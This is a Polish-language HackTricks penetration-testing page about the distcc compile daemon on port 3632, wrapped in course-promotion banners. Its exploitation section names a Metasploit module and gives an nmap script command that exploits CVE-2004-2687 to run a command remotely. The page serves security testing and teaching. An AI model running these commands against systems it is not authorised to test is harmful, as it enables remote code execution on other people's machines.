hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Distcc to narzędzie, które usprawnia proces kompilacji, wykorzystując bezczynną moc obliczeniową innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest zdolna do rozprowadzania swoich zadań kompilacji do innego systemu. Ten system odbiorczy musi uruchamiać demony distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć przesłany kod.

Domyślny port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Wykorzystanie

Sprawdź, czy jest podatny na CVE-2004-2687, aby wykonać dowolny kod:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Nie sądzę, że Shodan wykrywa tę usługę.

Zasoby

Post stworzony przez Álex B (@r1p)

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: